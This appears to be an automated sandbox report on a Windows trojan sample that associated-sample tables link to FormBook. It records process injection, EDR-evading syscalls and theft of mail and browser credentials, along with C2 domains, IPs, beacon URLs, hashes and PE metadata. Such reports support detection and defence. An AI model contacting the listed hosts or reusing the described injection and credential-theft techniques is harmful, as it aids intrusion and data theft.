            Source: Yara match | File source: 00000001.00000002.2162734748.0000000005C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3560663904.0000000002800000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000006.00000002.3561586168.0000000004490000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.3561735545.00000000056D0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            MITRE ATT&CK matrix, listed per tactic; a number in parentheses is the count of matched signatures for that technique, techniques without a number had no match:

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
            Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
            Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
            Privilege Escalation: Process Injection (412); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts
            Defense Evasion: Virtualization/Sandbox Evasion (2); Process Injection (412); Deobfuscate/Decode Files or Information (1); Abuse Elevation Control Mechanism (1); Obfuscated Files or Information (3); DLL Side-Loading (1)
            Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
            Discovery: Security Software Discovery (121); Virtualization/Sandbox Evasion (2); Process Discovery (2); Application Window Discovery (1); File and Directory Discovery (2); System Information Discovery (12)
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
            Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (1); Input Capture; Keylogging; GUI Input Capture
            Command and Control: Encrypted Channel (1); Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4); Fallback Channels; Multiband Communication
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

            Behavior Graph ID: 1528955 | Sample: 8mmZ7Bkoj1.exe | Start date: 08/10/2024 | Architecture: WINDOWS | Score: 100
            Domains / IPs contacted by the sample: www.impo232rt.xyz; www.trafegomagico.shop; 12 other IPs or domains
            Signatures on the sample: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 4 other signatures; Performs DNS queries to domains with low reputation (www.impo232rt.xyz)
            Process tree:
            8mmZ7Bkoj1.exe (started)
              signatures: Writes to foreign memory regions; Maps a DLL or memory area into another process; Switches to a custom stack to bypass stack traces
              -> svchost.exe (started)
                 signatures: Maps a DLL or memory area into another process
                 -> eKxwLXHhqpgy.exe (injected)
                    signatures: Found direct / indirect Syscall (likely to bypass EDR)
                    -> makecab.exe (started)
                       signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
                       -> eKxwLXHhqpgy.exe (injected)
                          network: thepeatear.online 84.32.84.32, ports 50016, 50017, 50018, NTT-LT-ASLT Lithuania; www.cenfresh.life 199.192.21.169, ports 50008, 50009, 50010, NAMECHEAP-NETUS United States; 3 other IPs or domains
                          signatures: Found direct / indirect Syscall (likely to bypass EDR)
                       -> firefox.exe (started)

            Source | Detection | Scanner | Label | Link
            8mmZ7Bkoj1.exe | 47% | ReversingLabs | Win32.Trojan.AutoitInject |
            8mmZ7Bkoj1.exe | 100% | Avira | HEUR/AGEN.1321671 |
            8mmZ7Bkoj1.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            https://ac.ecosia.org/autocomplete?q= | 0% | URL Reputation | safe |
            https://duckduckgo.com/chrome_newtab | 0% | URL Reputation | safe |
            https://duckduckgo.com/ac/?q= | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | 0% | URL Reputation | safe |
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | 0% | URL Reputation | safe |
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | 0% | URL Reputation | safe |
            https://www.ecosia.org/newtab/ | 0% | URL Reputation | safe |
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | 0% | URL Reputation | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            www.impo232rt.xyz | 176.32.38.141 | true | true | | unknown
            crowsecurity.cloud | 3.33.130.190 | true | true | | unknown
            digitalbloom.info | 3.33.130.190 | true | true | | unknown
            www.cenfresh.life | 199.192.21.169 | true | true | | unknown
            thepeatear.online | 84.32.84.32 | true | true | | unknown
            www.nad5.shop | 156.226.22.233 | true | true | | unknown
            myjiorooms.services | 3.33.130.190 | true | true | | unknown
            www.thepeatear.online | unknown | unknown | true | | unknown
            www.mktimediato.online | unknown | unknown | true | | unknown
            www.digitalbloom.info | unknown | unknown | true | | unknown
            www.trafegomagico.shop | unknown | unknown | true | | unknown
            www.schoolsfrirstfcu.org | unknown | unknown | true | | unknown
            www.crowsecurity.cloud | unknown | unknown | true | | unknown
            www.myjiorooms.services | unknown | unknown | true | | unknown
            Name | Malicious | Antivirus Detection | Reputation
            http://www.thepeatear.online/pt4m/?nrs8j=AzKTe9sU/un6FWh8J4Z/TBPHes/wm2VwkqZ8OIQkGxADXwK45dBXsHOALtRz338sDHJ9qmiySJX4ofZpl75YgKir24cXfpRpIxKZjJwadTshiHDArMKxe74=&Yp=eXMH4fkp | true | | unknown
            http://www.impo232rt.xyz/azcx/?nrs8j=irMYamRxHtj3NMD2tLgxvViSvpLqwhvn7ehZdObCxtX/sdDuQfcDsrOzu60Trx/UY7Wv4F1shT0OqKdZ6j2zU9VfvWpTmK3e9j1Z+5zsY7kVMmPgkcjeH9Y=&Yp=eXMH4fkp | true | | unknown
            http://www.crowsecurity.cloud/oigd/ | true | | unknown
            http://www.nad5.shop/i70z/?Yp=eXMH4fkp&nrs8j=8fwlLwm+T0nphGhW7PHH3xFKB5SB8SFc9+r/t0QDCeclosptBaw61DZvImsaGCeeZR7Fl0K64LM59E0NLQ1vdm4QrRMTpos6Kj6ui5/Q8OeERMbnF/TN1fg= | true | | unknown
            http://www.digitalbloom.info/paa2/?Yp=eXMH4fkp&nrs8j=qDBzf3Em8FMnDuZYbVfiL5sknZWYhueoT0F4r09hh9DCbJoHqCNNB+hYoG1Us3VrdNJQeWmKv3CCTbgwH3NiU5qDwpXvlmSTPuYmawVAsPwUoUwLb74j9YI= | true | | unknown
            http://www.myjiorooms.services/tlbx/ | true | | unknown
            http://www.cenfresh.life/6iok/?Yp=eXMH4fkp&nrs8j=Lr8I5vR8kZnO1BXwYoMTGZrf0zW9P9gXQAsQehgeDaNdyJVo64QKCUs+Z9VbQDUfL8+SUHVZNFYLvGD3PrMcSw81RdJBHrPngUHAq0ps+A4FRAxn/QrS6wg= | true | | unknown
            http://www.impo232rt.xyz/azcx/ | true | | unknown
            http://www.digitalbloom.info/paa2/ | true | | unknown
            http://www.thepeatear.online/pt4m/ | true | | unknown
            http://www.cenfresh.life/6iok/ | true | | unknown
            Name | Source | Malicious | Antivirus Detection | Reputation
            https://ac.ecosia.org/autocomplete?q= | makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://duckduckgo.com/chrome_newtab | makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://duckduckgo.com/ac/?q= | makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://www.google.com/images/branding/product/ico/googleg_lodp.ico | makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
            http://www.crowsecurity.cloud | eKxwLXHhqpgy.exe, 00000007.00000002.3563473884.0000000005680000.00000040.80000000.00040000.00000000.sdmp | false | | unknown
            https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search | makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q= | makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command= | makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://www.ecosia.org/newtab/ | makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q= | makecab.exe, 00000006.00000003.2345165836.0000000007A3E000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
            IP | Domain | Country | ASN | ASN Name | Malicious
            199.192.21.169 | www.cenfresh.life | United States | 22612 | NAMECHEAP-NETUS | true
            156.226.22.233 | www.nad5.shop | Seychelles | 132813 | AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK | true
            84.32.84.32 | thepeatear.online | Lithuania | 33922 | NTT-LT-ASLT | true
            176.32.38.141 | www.impo232rt.xyz | Russian Federation | 51659 | ASBAXETRU | true
            3.33.130.190 | crowsecurity.cloud | United States | 8987 | AMAZONEXPANSIONGB | true
                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                  Analysis ID:1528955
                                                                  Start date and time:2024-10-08 14:16:30 +02:00
                                                                  Joe Sandbox product:CloudBasic
                                                                  Overall analysis duration:0h 8m 38s
                                                                  Hypervisor based Inspection enabled:false
                                                                  Report type:full
                                                                  Cookbook file name:default.jbs
                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                  Run name:Run with higher sleep bypass
Number of new started processes analysed:8
                                                                  Number of new started drivers analysed:0
                                                                  Number of existing processes analysed:0
                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:2
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:8mmZ7Bkoj1.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:64c5d2e74511fbe252cb0351a21a86df6d98ac07bd4cc92a35086b1b1659257a.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@7/2@10/5
                                                                  EGA Information:
                                                                  • Successful, ratio: 80%
                                                                  HCA Information:
                                                                  • Successful, ratio: 87%
                                                                  • Number of executed functions: 14
                                                                  • Number of non-executed functions: 335
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe
                                                                  • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                  • VT rate limit hit for: 8mmZ7Bkoj1.exe
Time | Type | Description
08:18:45 | API Interceptor | 6159437x Sleep call for process: makecab.exe modified
Match (IP) | Associated Sample Name / URL | Detection | Threat Name | Context
199.192.21.169 | PURCHASE ORDER.exe | malicious | FormBook | www.selftip.top/85su/
 | update SOA.exe | malicious | FormBook | www.technectar.top/ghvt/
 | NVOICE FOR THE MONTH OF AUG-24.exe | malicious | FormBook | www.selftip.top/85su/
 | RFQ - HTS45785-24-0907I000.exe | malicious | FormBook | www.zenscape.top/d8cw/
 | Request for Quotation Hi-Tech Park Project 193200.exe | malicious | FormBook | www.zenscape.top/d8cw/
 | DEBIT NOTE 01ST SEP 2024.exe | malicious | FormBook | www.selftip.top/85su/
 | DCP11-83642024..exe | malicious | FormBook | www.urbanpulse.help/r50h/
 | PROFOMA INVOICE SHEET.exe | malicious | FormBook | www.selftip.top/85su/
 | SOLICITUD DE COTIZACI#U00d3N - 6721000232111.exe | malicious | FormBook | www.zenscape.top/d8cw/
 | file.exe | malicious | FormBook | www.urbanpulse.help/r50h/
156.226.22.233 | RECIEPT.PDF.exe | malicious | FormBook | www.nad5.shop/2xqm/
 | September Order.exe | malicious | FormBook | www.nad5.shop/cy90/
84.32.84.32 | Products Order Catalogs20242.exe | malicious | FormBook | www.pinkpantys.shop/cyro/
 | YSjOEAta07.exe | malicious | FormBook | www.pakmartcentral.shop/ml5l/
 | Pending invoices.exe | malicious | FormBook | www.b-ambu.com/a2tr/
 | PURCHASE ORDER-6350.exe | malicious | FormBook | www.agilizeimob.app/we8s/
 | Narudzba ACH0036173.vbe | malicious | FormBook, GuLoader | www.casesrep.site/7z6q/
 | -pdf.bat.exe | malicious | FormBook | www.dfmagazine.shop/7k8f/
 | DHL_ 46773482.exe | malicious | FormBook | www.agilizeimob.app/bnrj/
 | Order.exe | malicious | FormBook | www.servehimfoundation.org/wlo5/
 | Quote #260924.exe | malicious | FormBook | www.thepeatear.online/lu5k/
 | Order 001-1.exe | malicious | FormBook | www.servehimfoundation.org/wlo5/
Match (Domain) | Associated Sample Name / URL | Detection | Threat Name | Context
www.nad5.shop | notificacion_de_credito__PDF__.exe | malicious | FormBook | 156.226.22.233
 | RECIEPT.PDF.exe | malicious | FormBook | 156.226.22.233
 | INV & BANK DETAILS LETTER.pdf.exe | malicious | FormBook | 156.226.22.233
 | September Order.exe | malicious | FormBook | 156.226.22.233
www.impo232rt.xyz | INV & BANK DETAILS LETTER.pdf.exe | malicious | FormBook | 176.32.38.141
www.cenfresh.life | SecuriteInfo.com.Win32.Malware-gen.10660.18305.exe | malicious | FormBook | 199.192.21.169
 | INV & BANK DETAILS LETTER.pdf.exe | malicious | FormBook | 199.192.21.169
Match (ASN Name) | Associated Sample Name / URL | Detection | Threat Name | Context
NTT-LT-ASLT | Products Order Catalogs20242.exe | malicious | FormBook | 84.32.84.32
 | YSjOEAta07.exe | malicious | FormBook | 84.32.84.32
 | Pending invoices.exe | malicious | FormBook | 84.32.84.32
 | SOA SEPT 2024.exe | malicious | FormBook | 84.32.84.32
 | PURCHASE ORDER-6350.exe | malicious | FormBook | 84.32.84.32
 | 1728239644b6c097b50f50c5ed70baa52a8cacbfdc1e82b38c0aa5c471e1a07dbef595bc59540.dat-decoded.exe | malicious | Remcos | 84.32.44.139
 | MKWbWHd5Ni.rtf | malicious | Remcos | 84.32.44.139
 | Narudzba ACH0036173.vbe | malicious | FormBook, GuLoader | 84.32.84.32
 | http://ipscanadvsf.com | malicious | Unknown | 84.32.84.33
 | GEJMING DUO USD 20241002144902.docx.doc | malicious | Remcos | 84.32.44.139
AISI-AS-APHKAISICLOUDCOMPUTINGLIMITEDHK | notificacion_de_credito__PDF__.exe | malicious | FormBook | 156.226.22.233
 | RECIEPT.PDF.exe | malicious | FormBook | 156.226.22.233
 | INV & BANK DETAILS LETTER.pdf.exe | malicious | FormBook | 156.226.22.233
 | September Order.exe | malicious | FormBook | 156.226.22.233
 | Tomcat.bin.exe | malicious | Unknown | 216.250.106.146
 | b4cbf3ffbd8e152116e72487c3b16f1d.exe | malicious | Unknown | 216.250.106.146
 | Tomcat.bin.exe | malicious | Unknown | 216.250.106.146
 | b4cbf3ffbd8e152116e72487c3b16f1d.exe | malicious | Unknown | 216.250.106.146
 | jURI57sJ9G.exe | malicious | GhostRat, Nitol | 154.211.23.99
 | Shipment_Document_BL,INV_and_packing_list.jpg.exe | malicious | FormBook, NSISDropper | 154.205.10.163
ASBAXETRU | na.elf | malicious | Unknown | 46.29.161.108
 | INV & BANK DETAILS LETTER.pdf.exe | malicious | FormBook | 176.32.38.141
 | VZRdl605xh.elf | malicious | Gafgyt, Mirai | 176.32.39.130
 | KtEQ20VGM9.elf | malicious | Gafgyt, Mirai | 176.32.39.130
 | 1qKutBuGUV.elf | malicious | Gafgyt, Mirai | 176.32.39.130
 | 5aNi3U9NPU.elf | malicious | Gafgyt, Mirai | 176.32.39.130
 | c2wtBlVImo.elf | malicious | Gafgyt, Mirai | 176.32.39.130
 | QjIppLmakb.elf | malicious | Gafgyt, Mirai | 176.32.39.130
 | LockyRansom.exe | malicious | Unknown | 46.17.44.153
 | LockyRansom.exe | malicious | Unknown | 46.17.44.153
NAMECHEAP-NETUS | FDA.exe | malicious | FormBook | 198.54.125.199
 | PURCHASED ORDER OF ENG091.exe | malicious | FormBook | 63.250.38.167
 | na.elf | malicious | Mirai | 162.255.117.53
 | PO_89_202876.Pdf.exe | malicious | MassLogger RAT, Snake Keylogger, VIP Keylogger | 198.54.114.247
 | Products Order Catalogs20242.exe | malicious | FormBook | 68.65.122.222
 | IRYzGMMbSw.exe | malicious | FormBook | 162.213.249.216
 | Arrival Notice.exe | malicious | FormBook | 162.0.238.238
 | Arrival notice.exe | malicious | FormBook | 162.0.238.246
 | http://buddycities.com/ | malicious | Unknown | 162.255.119.35
 | http://buckboosters.com/ | malicious | Unknown | 192.64.119.229
                                                                  Process:C:\Users\user\Desktop\8mmZ7Bkoj1.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):288256
                                                                  Entropy (8bit):7.994133338679452
                                                                  Encrypted:true
                                                                  SSDEEP:6144:7FTd3/4Mio99hAO8MZqJ39X4+6xAU9Mjz4o5J0cfD4c2XFF:BVZ99yJ9ox/9QVJ0cJC
                                                                  MD5:F9D7E9B85ADEA68BE938D26292592F40
                                                                  SHA1:EEB352FFA38F200C01D57421BE9C93CF01081D1D
                                                                  SHA-256:CCD27626028C724EAD4E096C60D76167DDCEA55B66E1CD6916BA1551372B2C1D
                                                                  SHA-512:32E74EF987C2BD3A55AF08BE1226016651C8497C09C3684769D47CE554B818F89E6E0C3603712197A44B7EB546530C08DE833C90F5F0DA6BEECF4E39ADA6296E
                                                                  Malicious:false
                                                                  Reputation:low
                                                                  Process:C:\Windows\SysWOW64\makecab.exe
                                                                  File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                  Category:dropped
                                                                  Size (bytes):114688
                                                                  Entropy (8bit):0.9746603542602881
                                                                  Encrypted:false
                                                                  SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                  MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                  SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                  SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                  SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                  Malicious:false
                                                                  Reputation:high, very likely benign file
                                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                  Entropy (8bit):7.543293751073524
                                                                  TrID:
                                                                  • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                                                  • DOS Executable Generic (2002/1) 0.02%
                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                  File name:8mmZ7Bkoj1.exe
                                                                  File size:1'366'295 bytes
                                                                  MD5:cce5d60668494a747ca41f5d8b17e76a
                                                                  SHA1:9f29f6cad0687318f9ce75c0145b68914fd0e422
                                                                  SHA256:64c5d2e74511fbe252cb0351a21a86df6d98ac07bd4cc92a35086b1b1659257a
                                                                  SHA512:b5c5c320ab51db83777ee65a1c245521fd3541827f793dc361cebea49f5890a2049b06aa347b5c373e37490573f748bc5815cbaa856ec32c83323730179781c2
                                                                  SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCXPridnU0jF/veqwVbb+PVZzsb5Utin8:7JZoQrbTFZY1iaCXPrULDwVf+PV2bX8
                                                                  TLSH:F955E122F5D69036C2B323719E7EF7699A3D79361336D29B23C81E215EA04416B39733
                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                  Icon Hash:1733312925935517
                                                                  Entrypoint:0x4165c1
                                                                  Entrypoint Section:.text
                                                                  Digitally signed:false
                                                                  Imagebase:0x400000
                                                                  Subsystem:windows gui
                                                                  Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                  DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                  Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                  TLS Callbacks:
                                                                  CLR (.Net) Version:
                                                                  OS Version Major:5
                                                                  OS Version Minor:0
                                                                  File Version Major:5
                                                                  File Version Minor:0
                                                                  Subsystem Version Major:5
                                                                  Subsystem Version Minor:0
                                                                  Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                  Instruction
                                                                  call 00007F0D7084BD6Bh
                                                                  jmp 00007F0D70842BDEh
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  int3
                                                                  push ebp
                                                                  mov ebp, esp
                                                                  push edi
                                                                  push esi
                                                                  mov esi, dword ptr [ebp+0Ch]
                                                                  mov ecx, dword ptr [ebp+10h]
                                                                  mov edi, dword ptr [ebp+08h]
                                                                  mov eax, ecx
                                                                  mov edx, ecx
                                                                  add eax, esi
cmp edi, esi
jbe 00007F0D70842D5Ah
cmp edi, eax
jc 00007F0D70842EF6h
cmp ecx, 00000080h
jc 00007F0D70842D6Eh
cmp dword ptr [004A9724h], 00000000h
je 00007F0D70842D65h
push edi
push esi
and edi, 0Fh
and esi, 0Fh
cmp edi, esi
pop esi
pop edi
jne 00007F0D70842D57h
jmp 00007F0D70843132h
test edi, 00000003h
jne 00007F0D70842D66h
shr ecx, 02h
and edx, 03h
cmp ecx, 08h
jc 00007F0D70842D7Bh
rep movsd
jmp dword ptr [00416740h+edx*4]
mov eax, edi
mov edx, 00000003h
sub ecx, 04h
jc 00007F0D70842D5Eh
and eax, 03h
add ecx, eax
jmp dword ptr [00416654h+eax*4]
jmp dword ptr [00416750h+ecx*4]
nop
jmp dword ptr [004166D4h+ecx*4]
nop
inc cx
add byte ptr [eax-4BFFBE9Ah], dl
inc cx
add byte ptr [ebx], ah
ror dword ptr [edx-75F877FAh], 1
inc esi
add dword ptr [eax+468A0147h], ecx
add al, cl
jmp 00007F0D72CBB557h
add esi, 03h
add edi, 03h
cmp ecx, 08h
jc 00007F0D70842D1Eh
rep movsd
jmp dword ptr [00000000h+edx*4]
Programming Language:
• [ C ] VS2010 SP1 build 40219
• [C++] VS2010 SP1 build 40219
• [ C ] VS2008 SP1 build 30729
• [IMP] VS2008 SP1 build 30729
• [ASM] VS2010 SP1 build 40219
• [RES] VS2010 SP1 build 40219
• [LNK] VS2010 SP1 build 40219
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8d41c | 0x154 | .rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xab000 | 0x9328 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x82000 | 0x844 | .rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x1000 | 0x8061c | 0x80800 | 61ffce4768976fa0dd2a8f6a97b1417a | False | 0.5583182605787937 | data | 6.684690148171278 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata | 0x82000 | 0xdfc0 | 0xe000 | 0354bc5f2376b5e9a4a3ba38b682dff1 | False | 0.36085728236607145 | data | 4.799741132252136 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data | 0x90000 | 0x1a758 | 0x6800 | 8033f5a38941b4685bc2299e78f31221 | False | 0.15324519230769232 | data | 2.1500715391677487 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0xab000 | 0x9328 | 0x9400 | 495451d7eb8326bd9fa2714869ea6de8 | False | 0.49002322635135137 | data | 5.541804843154628 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xab5c8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xab6f0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xab818 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xab940 | 0x668 | Device independent bitmap graphic, 48 x 96 x 4, image size 1152 | English | Great Britain | 0.48109756097560974
RT_ICON | 0xabfa8 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 512 | English | Great Britain | 0.5672043010752689
RT_ICON | 0xac290 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128 | English | Great Britain | 0.6418918918918919
RT_ICON | 0xac3b8 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors | English | Great Britain | 0.7044243070362474
RT_ICON | 0xad260 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors | English | Great Britain | 0.8077617328519856
RT_ICON | 0xadb08 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors | English | Great Britain | 0.5903179190751445
RT_ICON | 0xae070 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9600 | English | Great Britain | 0.5503112033195021
RT_ICON | 0xb0618 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4224 | English | Great Britain | 0.6050656660412758
RT_ICON | 0xb16c0 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1088 | English | Great Britain | 0.7553191489361702
RT_MENU | 0xb1b28 | 0x50 | data | English | Great Britain | 0.9
RT_DIALOG | 0xb1b78 | 0xfc | data | English | Great Britain | 0.6507936507936508
RT_STRING | 0xb1c78 | 0x530 | data | English | Great Britain | 0.33960843373493976
RT_STRING | 0xb21a8 | 0x690 | data | English | Great Britain | 0.26964285714285713
RT_STRING | 0xb2838 | 0x4d0 | data | English | Great Britain | 0.36363636363636365
RT_STRING | 0xb2d08 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xb3308 | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xb3968 | 0x388 | data | English | Great Britain | 0.377212389380531
RT_STRING | 0xb3cf0 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | United States | 0.502906976744186
RT_GROUP_ICON | 0xb3e48 | 0x84 | data | English | Great Britain | 0.6439393939393939
RT_GROUP_ICON | 0xb3ed0 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0xb3ee8 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0xb3f00 | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0xb3f18 | 0x19c | data | English | Great Britain | 0.5339805825242718
RT_MANIFEST | 0xb40b8 | 0x26c | ASCII text, with CRLF line terminators | English | United States | 0.5145161290322581
DLL | Import
